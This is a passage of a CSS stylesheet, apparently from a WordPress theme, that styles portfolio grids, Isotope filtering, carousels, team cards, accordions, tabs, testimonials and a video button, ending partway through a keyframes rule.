.project-item.double_wh, .project-item.double_w,
.grid-sizer.double_wh,
.grid-sizer.double_w {
  width: 66.66666666%;
}

.projects-grid.pf_5_cols .project-item,
.projects-grid.pf_5_cols .grid-sizer {
  width: 20%;
}
.projects-grid.pf_5_cols .project-item.double_wh, .projects-grid.pf_5_cols .project-item.double_w,
.projects-grid.pf_5_cols .grid-sizer.double_wh,
.projects-grid.pf_5_cols .grid-sizer.double_w {
  width: 40%;
}

.projects-grid.pf_4_cols .project-item,
.projects-grid.pf_4_cols .grid-sizer {
  width: 25%;
}
.projects-grid.pf_4_cols .project-item.double_wh, .projects-grid.pf_4_cols .project-item.double_w,
.projects-grid.pf_4_cols .grid-sizer.double_wh,
.projects-grid.pf_4_cols .grid-sizer.double_w {
  width: 50%;
}

.projects-grid.pf_2_cols .project-item,
.projects-grid.pf_2_cols .grid-sizer {
  width: 50%;
}
.projects-grid.pf_2_cols .project-item.double_wh, .projects-grid.pf_2_cols .project-item.double_w,
.projects-grid.pf_2_cols .grid-sizer.double_wh,
.projects-grid.pf_2_cols .grid-sizer.double_w {
  width: 100%;
}

.project-filter-wrapper .projects-grid {
  margin: -15px;
}
.project-filter-wrapper .projects-grid .project-item {
  padding: 15px;
}
.project-filter-wrapper .projects-grid .project-item.double_w .projects-thumbnail img {
  margin-top: -15px;
}

.projects-grid {
  position: relative;
  overflow: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  /* info style 2 */
  /* info hidden */
}
.projects-grid .projects-box {
  position: relative;
  overflow: hidden;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.projects-grid .projects-box .portfolio-info {
  width: 100%;
  height: 100%;
  position: absolute;
  bottom: 0;
  left: 0;
  background: rgba(254, 132, 35, 0.9);
  opacity: 0;
  display: flex;
  align-items: center;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.projects-grid .projects-box .portfolio-info .overlay {
  opacity: 1;
  background: transparent;
  z-index: 0;
}
.projects-grid .projects-box .portfolio-info .portfolio-info-inner {
  text-align: center;
  padding: 20px 0;
  width: 100%;
  z-index: 1;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.projects-grid .projects-box .portfolio-info h5 {
  color: #fff;
  padding: 0 30px;
  margin-bottom: 15px;
}
.projects-grid .projects-box .portfolio-info h5 a {
  color: #fff;
}
.projects-grid .projects-box .portfolio-info .portfolio-cates {
  color: #fff;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  font-size: 14px;
  text-transform: uppercase;
  letter-spacing: 0.5px;
  margin-bottom: 0;
  padding: 0 30px;
}
.projects-grid .projects-box .portfolio-info .portfolio-cates a {
  color: #fff;
  line-height: 1;
  display: inline;
  background-size: 0 1px;
  background-position: 0 100%;
  background-repeat: no-repeat;
  background-image: linear-gradient(0deg, #fff, #f5f5f5);
}
.projects-grid .projects-box .portfolio-info .portfolio-cates a:hover {
  background-size: 100% 1px;
}
.projects-grid .projects-box .portfolio-info .portfolio-cates span:first-child {
  display: none;
}
.projects-grid .projects-box .portfolio-info .plus {
  cursor: pointer;
  display: inline-block;
  text-align: center;
  line-height: 60px;
  width: 60px;
  height: 60px;
  font-size: 21px;
  margin: 0 25px 22px 25px;
  border: 1px solid #fff;
  color: #fff;
  background: rgba(255, 255, 255, 0.2);
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.projects-grid .projects-box .portfolio-info .plus:hover {
  -webkit-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  transform: rotate(90deg);
}
.projects-grid .projects-box .projects-thumbnail {
  overflow: hidden;
}
.projects-grid .projects-box .projects-thumbnail .overlay {
  visibility: hidden;
}
.projects-grid .projects-box img {
  width: 100%;
  height: auto;
  display: block;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.projects-grid .projects-box:hover .portfolio-info {
  opacity: 1;
}
.projects-grid.style-2 div.portfolio-info {
  background: none;
  align-items: flex-end;
  height: auto;
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner {
  text-align: left;
  background: #fff;
  padding: 21px 20px;
  -webkit-transform: translateY(40%);
  -ms-transform: translateY(40%);
  transform: translateY(40%);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner h5 {
  margin-bottom: 8px;
  padding: 0;
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner h5 a {
  color: #1b1d21;
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner .portfolio-cates {
  padding: 0;
  color: #9d9d9d;
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner .portfolio-cates a {
  color: #9d9d9d;
  background-image: linear-gradient(0deg, #9d9d9d, #f5f5f5);
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner .portfolio-cates a:hover {
  opacity: 1;
}
.projects-grid.style-2 div.portfolio-info .portfolio-info-inner .plus {
  display: none;
}
.projects-grid.style-2 .projects-box:hover .portfolio-info-inner {
  -webkit-transform: translateY(0);
  -ms-transform: translateY(0);
  transform: translateY(0);
}
.projects-grid.style-3 .projects-thumbnail {
  position: relative;
}
.projects-grid.style-3 .projects-thumbnail .overlay {
  background: rgba(254, 132, 35, 0.9);
  opacity: 0;
  visibility: hidden;
  z-index: 1;
  display: none;
  cursor: pointer;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.projects-grid.style-3 .projects-thumbnail .overlay i {
  position: absolute;
  top: 50%;
  left: 50%;
  width: 60px;
  height: 60px;
  line-height: 60px;
  text-align: center;
  border: 1px solid #fff;
  color: #fff;
  background: rgba(255, 255, 255, 0.2);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  -webkit-transform: translateY(-50%) translateX(-50%);
  -ms-transform: translateY(-50%) translateX(-50%);
  transform: translateY(-50%) translateX(-50%);
}
.projects-grid.style-3 .projects-thumbnail .overlay i:before {
  font-size: 21px;
}
.projects-grid.style-3 .projects-thumbnail .overlay i:hover {
  -webkit-transform: translateY(-50%) translateX(-50%) rotate(90deg);
  -ms-transform: translateY(-50%) translateX(-50%) rotate(90deg);
  transform: translateY(-50%) translateX(-50%) rotate(90deg);
}
.projects-grid.style-3 .projects-thumbnail:hover .overlay {
  opacity: 1;
  visibility: visible;
}
.projects-grid.style-3 .portfolio-info {
  display: none;
}
.projects-grid.img-popup .projects-thumbnail .overlay {
  display: block;
}
.projects-grid.img-scale .projects-box:hover img {
  -webkit-transform: scale(1.1);
  -ms-transform: scale(1.1);
  transform: scale(1.1);
}
.projects-grid.no-cat .portfolio-cates {
  display: none;
}
.projects-grid.no-icon .projects-box .portfolio-info .plus,
.projects-grid.no-icon .projects-thumbnail i {
  display: none;
}

/*** load more button ***/
.btn-block {
  text-align: center;
  clear: both;
}
.btn-block .octf-btn {
  margin-top: 60px;
}
.btn-block .octf-btn:after, .btn-block .octf-btn:before {
  display: none;
}
.btn-block .octf-btn i {
  margin-left: 10px;
}

/* Start: Recommended Isotope styles */
/**** Isotope Filtering ****/
.isotope-item {
  z-index: 2;
}

.isotope-hidden.isotope-item {
  pointer-events: none;
  z-index: 1;
}

/**** Isotope CSS3 transitions ****/
.isotope,
.isotope .isotope-item {
  -webkit-transition-duration: 0.6s;
  -moz-transition-duration: 0.6s;
  -ms-transition-duration: 0.6s;
  -o-transition-duration: 0.6s;
  transition-duration: 0.6s;
}

.isotope {
  -webkit-transition-property: height, width;
  -moz-transition-property: height, width;
  -ms-transition-property: height, width;
  -o-transition-property: height, width;
  transition-property: height, width;
}

.isotope .isotope-item {
  -webkit-transition-property: -webkit-transform, opacity;
  -moz-transition-property: -moz-transform, opacity;
  -ms-transition-property: -ms-transform, opacity;
  -o-transition-property: -o-transform, opacity;
  transition-property: transform, opacity;
}

/**** disabling Isotope CSS3 transitions ****/
.isotope.no-transition,
.isotope.no-transition .isotope-item,
.isotope .isotope-item.no-transition {
  -webkit-transition-duration: 0s;
  -moz-transition-duration: 0s;
  -ms-transition-duration: 0s;
  -o-transition-duration: 0s;
  transition-duration: 0s;
}

/* End: Recommended Isotope styles */
/* project carousel */
.project-slider .projects-box {
  overflow: hidden;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.project-slider .projects-box img {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.project-slider .projects-box .portfolio-info {
  position: absolute;
  bottom: 0;
  left: 0;
  padding: 45px 50px;
  width: 100%;
  z-index: 1;
}
.project-slider .projects-box .portfolio-info h5 {
  margin-bottom: 15px;
  font-size: 30px;
  font-weight: 600;
}
.project-slider .projects-box .portfolio-info h5 a {
  color: #fff;
}
.project-slider .projects-box .portfolio-info .portfolio-cates {
  color: #e9e9e9;
  font-family: "Inter", sans-serif;
  font-weight: 500;
  font-size: 14px;
  text-transform: uppercase;
  letter-spacing: 0.5px;
  margin-bottom: 0;
}
.project-slider .projects-box .portfolio-info .portfolio-cates a {
  color: #e9e9e9;
  line-height: 1;
  display: inline;
  background-size: 0 1px;
  background-position: 0 100%;
  background-repeat: no-repeat;
  background-image: linear-gradient(0deg, #e9e9e9, #f5f5f5);
}
.project-slider .projects-box .portfolio-info .portfolio-cates a:hover {
  background-size: 100% 1px;
}
.project-slider .projects-box .portfolio-info .portfolio-cates span:first-child {
  display: none;
}
.project-slider.img-scale .projects-box:hover img {
  -webkit-transform: scale(1.05);
  -ms-transform: scale(1.05);
  transform: scale(1.05);
}
.project-slider.no-cat .portfolio-info h5 {
  margin-bottom: 0;
}
.project-slider.no-cat .portfolio-cates {
  display: none;
}

.project-bottom {
  border-top: 1px solid rgba(0, 0, 0, 0.1);
  padding-bottom: 100px;
}

.single-portfolio-navigation {
  padding-top: 42px;
}
.single-portfolio-navigation .post-nav {
  margin-bottom: 0;
}
.single-portfolio-navigation .info-post span span {
  margin: 0 3px;
}
.single-portfolio-navigation .info-post span span:last-child {
  display: none;
}

.portfolio-related-posts-wrap {
  padding-top: 70px;
}
.portfolio-related-posts-wrap .project-item {
  width: 100%;
  float: none;
}

.portfolio-related-title-wrap h4 {
  margin-bottom: 35px;
}

@media only screen and (max-width: 1199px) {
  .projects-grid.pf_5_cols .grid-sizer,
.projects-grid.pf_5_cols .project-item,
.projects-grid.pf_4_cols .grid-sizer,
.projects-grid.pf_4_cols .project-item {
    width: 33.333333%;
  }
  .projects-grid.pf_5_cols .grid-sizer.double_wh, .projects-grid.pf_5_cols .grid-sizer.double_w,
.projects-grid.pf_5_cols .project-item.double_wh,
.projects-grid.pf_5_cols .project-item.double_w,
.projects-grid.pf_4_cols .grid-sizer.double_wh,
.projects-grid.pf_4_cols .grid-sizer.double_w,
.projects-grid.pf_4_cols .project-item.double_wh,
.projects-grid.pf_4_cols .project-item.double_w {
    width: 66.666666%;
  }
}
@media only screen and (max-width: 1024px) {
  .project-bottom {
    padding-bottom: 60px;
  }
}
@media only screen and (max-width: 992px) {
  .project-item,
.grid-sizer,
.projects-grid.pf_5_cols .grid-sizer,
.projects-grid.pf_5_cols .project-item,
.projects-grid.pf_4_cols .grid-sizer,
.projects-grid.pf_4_cols .project-item {
    width: 50%;
  }
  .project-item.double_wh, .project-item.double_w,
.grid-sizer.double_wh,
.grid-sizer.double_w,
.projects-grid.pf_5_cols .grid-sizer.double_wh,
.projects-grid.pf_5_cols .grid-sizer.double_w,
.projects-grid.pf_5_cols .project-item.double_wh,
.projects-grid.pf_5_cols .project-item.double_w,
.projects-grid.pf_4_cols .grid-sizer.double_wh,
.projects-grid.pf_4_cols .grid-sizer.double_w,
.projects-grid.pf_4_cols .project-item.double_wh,
.projects-grid.pf_4_cols .project-item.double_w {
    width: 100%;
  }
}
@media only screen and (max-width: 768px) {
  .projects-box .portfolio-info {
    right: 0;
    opacity: 1;
  }

  .projects-style-1 .projects-box .portfolio-info .portfolio-info-inner {
    padding: 30px;
  }

  .projects-style-1 .projects-box .portfolio-info h5 {
    font-size: 20px;
  }

  .projects-style-1 .projects-box .portfolio-info .portfolio-cates {
    font-size: 12px;
  }
}
@media only screen and (max-width: 600px) {
  .project-item,
.grid-sizer,
.projects-grid.pf_5_cols .project-item,
.projects-grid.pf_4_cols .project-item,
.projects-grid.pf_2_cols .project-item {
    width: 100%;
  }

  .project_filters li {
    margin-left: 10px;
    margin-right: 10px;
  }
}
/*--------------------------------------------------------------
## Post
--------------------------------------------------------------*/
.post-slider .post-box .post-inner {
  margin-bottom: 0;
}
.post-slider .post-box .inner-post {
  padding: 32px 30px 26px;
}
.post-slider .post-box h5 {
  margin-bottom: 0;
}
.post-slider .post-box .entry-meta {
  padding: 14px 30px;
}
.post-slider .post-box .entry-meta .btn-details {
  right: 8px;
}
.post-slider .post-box .the-excerpt {
  margin-top: 10px;
}
.post-slider .post-box:hover {
  -webkit-transform: translateY(-15px);
  -ms-transform: translateY(-15px);
  transform: translateY(-15px);
}
.post-slider .entry-meta .byline {
  display: none;
}
.post-slider .owl-stage-outer {
  margin: -30px;
  padding: 30px;
}
.post-slider .owl-stage-outer .owl-item {
  opacity: 0;
  visibility: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.post-slider .owl-stage-outer .owl-item.active {
  opacity: 1;
  visibility: visible;
  transition: all 0s linear;
  -webkit-transition: all 0s linear;
  -moz-transition: all 0s linear;
  -o-transition: all 0s linear;
  -ms-transition: all 0s linear;
}
.post-slider .owl-nav button.owl-prev {
  left: -80px;
}
.post-slider .owl-nav button.owl-next {
  right: -80px;
}

@media (max-width: 479px) {
  .post-box .post-inner .inner-post {
    padding: 32px 20px 26px;
  }

  .post-box .post-inner .entry-meta {
    padding-left: 20px;
    padding-right: 20px;
    font-size: 12px;
  }
}
/*--------------------------------------------------------------
## Team
--------------------------------------------------------------*/
.ot-team {
  text-align: center;
  overflow: hidden;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.ot-team .team-info {
  background: #fff;
  padding: 28px 30px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.ot-team .team-info h6 {
  margin-bottom: 5px;
  font-weight: 600;
}
.ot-team .team-info span {
  font-family: "Inter", sans-serif;
  font-size: 12px;
  font-weight: 600;
  text-transform: uppercase;
  color: #fe8423;
}
.ot-team .team-thumb {
  position: relative;
}
.ot-team h6 a:hover {
  color: #1b1d21;
}

/* team 1 */
.team-1 .team-social {
  position: absolute;
  bottom: 10px;
  left: 10px;
}
.team-1 .team-social span, .team-1 .team-social a {
  display: block;
  text-align: center;
  width: 40px;
  height: 40px;
  line-height: 40px;
  font-size: 14px;
  background: #262832;
  color: #fff;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.team-1 .team-social span, .team-1 .team-social a:hover {
  cursor: pointer;
  background: #fff;
  color: #262832;
  font-weight: bold;
}
.team-1 .team-social span:before {
  display: block;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.team-1 .team-social a {
  opacity: 0;
  visibility: hidden;
  margin-bottom: 5px;
}
.team-1 .team-social a svg {
  width: 16px;
  fill: #fff;
  vertical-align: middle;
}
.team-1 .team-social.active a {
  opacity: 1;
  visibility: visible;
  margin-bottom: 10px;
}
.team-1 .team-social.active span:before {
  -webkit-transform: rotate(45deg);
  -ms-transform: rotate(45deg);
  transform: rotate(45deg);
}
.team-1:hover .team-info {
  background: #262832;
}
.team-1:hover .team-info h6,
.team-1:hover .team-info h6 a {
  color: #fff;
}

/* team 2 */
.team-2 {
  position: relative;
}
.team-2 .team-info {
  position: absolute;
  bottom: 0;
  left: 50%;
  width: calc(100% - 40px);
  opacity: 0;
  visibility: hidden;
  -webkit-transform: translateX(-50%);
  -ms-transform: translateX(-50%);
  transform: translateX(-50%);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
  -webkit-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
  -moz-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
}
.team-2 .team-info h6 {
  font-size: 24px;
}
.team-2 .team-info span {
  font-size: 14px;
}
.team-2:hover .team-info {
  bottom: 20px;
  opacity: 1;
  visibility: visible;
}

/* team 3 */
.team-3 {
  padding: 40px;
}
.team-3 .team-thumb {
  margin-bottom: 27px;
}
.team-3 .team-thumb a {
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  position: relative;
  display: inline-block;
  overflow: hidden;
  vertical-align: middle;
}
.team-3 .team-thumb a:before {
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  left: 0;
  top: 0;
  background: rgba(254, 132, 35, 0.8);
  opacity: 0;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.team-3 .team-thumb a:after {
  content: "";
  font-family: Flaticon;
  font-size: 23px;
  line-height: 1;
  position: absolute;
  top: 50%;
  left: 50%;
  margin: -11px 0 0 -11px;
  color: #fff;
  opacity: 0;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.team-3 .team-info {
  padding: 0;
  background: transparent;
}
.team-3 .team-info h6 {
  font-weight: 700;
}
.team-3:hover a:before,
.team-3:hover a:after {
  opacity: 1;
}

.circle-social .team-social {
  margin-top: 15px;
}
.circle-social .team-social a {
  display: inline-block;
  width: 30px;
  height: 30px;
  text-align: center;
  line-height: 30px;
  font-size: 12px;
  margin-right: 7px;
  border: 1px solid rgba(11, 11, 11, 0.2);
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.circle-social .team-social a:last-child {
  margin: 0;
}
.circle-social .team-social a svg {
  width: 12px;
  fill: #1b1d21;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.circle-social .team-social a:hover {
  color: #fff;
  border-color: transparent;
  background: #fe8423;
}
.circle-social .team-social a:hover svg {
  fill: #fff;
}

/* team carousel */
.ot-team-carousel .ot-team {
  box-shadow: none;
}

/* our-team & single team */
.team-form {
  justify-content: space-between;
}
.team-form h4 {
  margin-bottom: 0;
  color: #fff;
}
.team-form > span.wpcf7-form-control-wrap {
  margin-right: 20px;
}
.team-form input[type=text],
.team-form input[type=email] {
  max-width: 290px;
  background: transparent;
  border-color: rgba(255, 255, 255, 0.6);
  color: #fff;
}
.team-form ::-webkit-input-placeholder {
  /* Chrome/Opera/Safari */
  color: #fff;
}
.team-form .octf-btn {
  background: #fff;
  color: #0b2a41;
}
.team-form .octf-btn:hover {
  background: #0b2a41;
  color: #fff;
}

.member-info {
  list-style: none;
  font-size: 16px;
  padding-left: 0;
}
.member-info li {
  padding-bottom: 15px;
}
.member-info li span {
  color: #1b1d21;
  font-family: "Inter", sans-serif;
  font-weight: 600;
}

@media only screen and (max-width: 1024px) {
  .team-form {
    display: block;
  }
  .team-form h4 {
    margin-bottom: 20px;
  }
  .team-form > div {
    display: block;
  }
  .team-form input[type=text],
.team-form input[type=email] {
    margin-bottom: 20px;
  }
  .team-form .octf-btn {
    display: block;
  }
}
@media only screen and (max-width: 767px) {
  .team-form input[type=text],
.team-form input[type=email] {
    max-width: 100%;
  }
}
/*--------------------------------------------------------------
## Accordion
--------------------------------------------------------------*/
.ot-accordions .acc-item {
  margin-bottom: 10px;
}
.ot-accordions .acc-item .acc-toggle {
  cursor: pointer;
  justify-content: space-between;
  overflow: hidden;
  font-family: "Inter", sans-serif;
  font-size: 16px;
  font-weight: 600;
  color: #1b1d21;
  padding: 9px 20px;
  background: #f6f6f6;
  border: 1px solid rgba(0, 0, 0, 0.15);
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.ot-accordions .acc-item .acc-toggle i {
  float: right;
  font-size: 16px;
}
.ot-accordions .acc-item .acc-content {
  display: none;
  padding: 20px 20px 12px;
  line-height: 30px;
}
.ot-accordions .acc-item .acc-content p:last-child, .ot-accordions .acc-item .acc-content ul:last-child {
  margin-bottom: 0;
}
.ot-accordions .acc-item.current .acc-toggle {
  background: #fe8423;
  border-color: #fe8423;
  color: #fff;
}
.ot-accordions .acc-item.current .acc-toggle i {
  -webkit-transform: rotate(-90deg);
  -ms-transform: rotate(-90deg);
  transform: rotate(-90deg);
}
.ot-accordions .acc-item:last-child {
  margin-bottom: 0;
}

/*--------------------------------------------------------------
## Tabs
--------------------------------------------------------------*/
.ot-tabs .tabs-heading {
  margin-bottom: 0;
  overflow: hidden;
}
.ot-tabs .tab-link {
  cursor: pointer;
  font-family: "Inter", sans-serif;
  font-size: 14px;
  font-weight: 600;
  min-width: 170px;
  margin-right: 30px;
  padding: 12px 0;
  float: left;
  text-align: center;
  text-transform: uppercase;
  color: #1b1d21;
  border-bottom: 3px solid #d7d7d7;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 1.5px;
  -moz-border-radius: 1.5px;
  border-radius: 1.5px;
}
.ot-tabs .tab-link.current, .ot-tabs .tab-link:hover {
  border-color: #fe8423;
}
.ot-tabs .tab-link:last-child {
  margin-right: 0;
}
.ot-tabs .tab-content {
  display: none;
  padding: 33px 0 0;
}
.ot-tabs .tab-content.current {
  display: inherit;
}
.ot-tabs .tab-content ul, .ot-tabs .tab-content ol {
  list-style: none;
  padding-left: 0;
  margin-top: 17px;
}
.ot-tabs .tab-content ul li, .ot-tabs .tab-content ol li {
  position: relative;
  padding-left: 46px;
  margin-bottom: 15px;
}
.ot-tabs .tab-content ul li:before, .ot-tabs .tab-content ol li:before {
  content: "";
  position: absolute;
  left: 0;
  top: 50%;
  -webkit-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  transform: translateY(-50%);
  width: 30px;
  height: 1px;
  background: #555555;
}
.ot-tabs .tab-content ul li:last-child, .ot-tabs .tab-content ol li:last-child {
  margin-bottom: 0;
}
.ot-tabs p:last-child,
.ot-tabs ul:last-child {
  margin-bottom: 0;
}

/*--------------------------------------------------------------
## Testimonials
--------------------------------------------------------------*/
.ot-testimonials .t-head {
  font-family: "Inter", sans-serif;
}
.ot-testimonials .t-head h6 {
  font-size: 22px;
  font-weight: 600;
  margin-bottom: 2px;
}
.ot-testimonials .t-head span {
  font-size: 13px;
  font-weight: 500;
  text-transform: uppercase;
  color: #fe8423;
}
.ot-testimonials .tphoto {
  width: 90px;
  position: relative;
}
.ot-testimonials .tphoto img {
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.ot-testimonials .tphoto:after {
  content: "";
  font-family: "Flaticon";
  position: absolute;
  top: -15px;
  right: -15px;
  font-size: 29px;
  background: #fe8423;
  color: #fff;
  width: 45px;
  height: 45px;
  text-align: center;
  line-height: 45px;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.ot-testimonials .owl-nav button.owl-prev {
  left: -80px;
}
.ot-testimonials .owl-nav button.owl-next {
  right: -80px;
}

.ot-testimonials-carousel .owl-stage-outer {
  margin: -30px;
  padding: 30px;
}
.ot-testimonials-carousel .owl-stage-outer .owl-item {
  opacity: 0;
  visibility: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.ot-testimonials-carousel .owl-stage-outer .owl-item.active {
  opacity: 1;
  visibility: visible;
  transition: all 0s linear;
  -webkit-transition: all 0s linear;
  -moz-transition: all 0s linear;
  -o-transition: all 0s linear;
  -ms-transition: all 0s linear;
}
.ot-testimonials-carousel .testi-item {
  background: #fff;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
}
.ot-testimonials-carousel .t-head {
  padding: 30px 40px;
  border-top: 1px solid rgba(0, 0, 0, 0.15);
  justify-content: left;
}
.ot-testimonials-carousel .tphoto {
  margin-right: 30px;
}
.ot-testimonials-carousel .ttext {
  padding: 33px 39px;
  font-size: 18px;
  line-height: 36px;
}
.ot-testimonials-carousel.is-reverse .testi-item {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  flex-direction: column-reverse;
}
.ot-testimonials-carousel.is-reverse .t-head {
  border-top: none;
  padding-bottom: 18px;
}
.ot-testimonials-carousel.is-reverse .ttext {
  padding-top: 0;
}

.ot-testimonials-carousel-2 {
  text-align: center;
}
.ot-testimonials-carousel-2 .tphoto {
  margin-top: 15px;
  margin-bottom: 12px;
  display: inline-block;
}
.ot-testimonials-carousel-2 .t-head {
  padding: 0;
  margin-top: 32px;
}
.ot-testimonials-carousel-2 .ttext {
  font-size: 22px;
  font-weight: 300;
}
.ot-testimonials-carousel-2 .owl-nav button.owl-prev,
.ot-testimonials-carousel-2 .owl-nav button.owl-next {
  background: rgba(220, 219, 219, 0.5);
  color: #1b1d21;
}

.dots-vertical .owl-dots {
  bottom: 50%;
  left: auto;
  right: -80px;
  width: auto;
  margin-top: 0 !important;
  -webkit-transform: translateY(50%);
  -ms-transform: translateY(50%);
  transform: translateY(50%);
}
.dots-vertical .owl-dots button.owl-dot {
  display: block;
}

.arrows-bottom .owl-carousel .owl-nav {
  top: auto;
  bottom: -120px;
  margin-top: 0;
}
.arrows-bottom .owl-carousel .owl-nav button {
  position: static;
}
.arrows-bottom .owl-carousel .owl-nav .owl-prev {
  border-top-left-radius: 3px;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 3px;
  -webkit-border-top-left-radius: 3px;
  -webkit-border-top-right-radius: 0;
  -webkit-border-bottom-right-radius: 0;
  -webkit-border-bottom-left-radius: 3px;
  -moz-border-radius-topleft: 3px;
  -moz-border-radius-topright: 0;
  -moz-border-radius-bottomright: 0;
  -moz-border-radius-bottomleft: 3px;
}
.arrows-bottom .owl-carousel .owl-nav .owl-next {
  border-top-left-radius: 0;
  border-top-right-radius: 3px;
  border-bottom-right-radius: 3px;
  border-bottom-left-radius: 0;
  -webkit-border-top-left-radius: 0;
  -webkit-border-top-right-radius: 3px;
  -webkit-border-bottom-right-radius: 3px;
  -webkit-border-bottom-left-radius: 0;
  -moz-border-radius-topleft: 0;
  -moz-border-radius-topright: 3px;
  -moz-border-radius-bottomright: 3px;
  -moz-border-radius-bottomleft: 0;
}

/*--------------------------------------------------------------
## Video Button
--------------------------------------------------------------*/
.ot-video-button a {
  position: relative;
  width: 56px;
  height: 56px;
  line-height: 56px;
  text-align: center;
  border: 1px solid;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.ot-video-button a i {
  margin-left: 2px;
  line-height: 1;
}
.ot-video-button a span {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border: 1px solid rgba(0, 0, 0, 0.3);
  z-index: -1;
  animation: circle-fade-before 2s infinite ease-in-out;
  -webkit-animation: circle-fade-before 2s infinite ease-in-out;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.ot-video-button a:hover span {
  border-color: #fe8423;
}
.ot-video-button > span {
  font-size: 14px;
  color: #1b1d21;
  text-transform: uppercase;
  font-weight: 600;
  margin-left: 10px;
}

@keyframes circle-fade-before {
  0% {
    transform: scale(1);
